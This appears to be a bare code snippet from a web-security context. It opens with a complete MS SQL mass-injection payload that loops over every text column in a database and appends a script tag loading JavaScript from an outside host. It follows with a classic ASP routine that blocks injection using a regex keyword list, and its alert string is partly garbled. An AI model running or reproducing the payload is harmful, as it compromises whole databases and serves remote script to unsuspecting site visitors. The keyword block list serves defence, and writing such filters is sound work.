DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u'AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM (CONVERT(VARCHAR(4000),['+@C+']))+'' <script src=http://cn.daxia123.cn/cn.js> </script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
<% Response.Buffer = True '緩存頁面 '防范get注入 If Request.QueryString <> ""Then StopInjection(Request.QueryString) '防范post注入 If Request.Form <> ""Then StopInjection(Request.Form) '防范cookies注入 If Request.Cookies <> ""Then StopInjection(Request.Cookies) '正則子函數 Function StopInjection(Values) Dim regEx Set regEx = New RegExp regEx.IgnoreCase = True regEx.Global = True regEx.Pattern = "'|;|#|([\s\b+()]+(select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|retun|as|go|exists)[\s\b+]*)" Dim sItem, sValue For Each sItem In Values sValue = Values(sItem) If regEx.Test(sValue) Then Response.Write "<ScriptLanguage=javascript>alert('非法注入!你的行為已被記錄?。?);history.back(-1);</script> " Response.End EndIf Next Set regEx = Nothing End function %>
400 186 1886
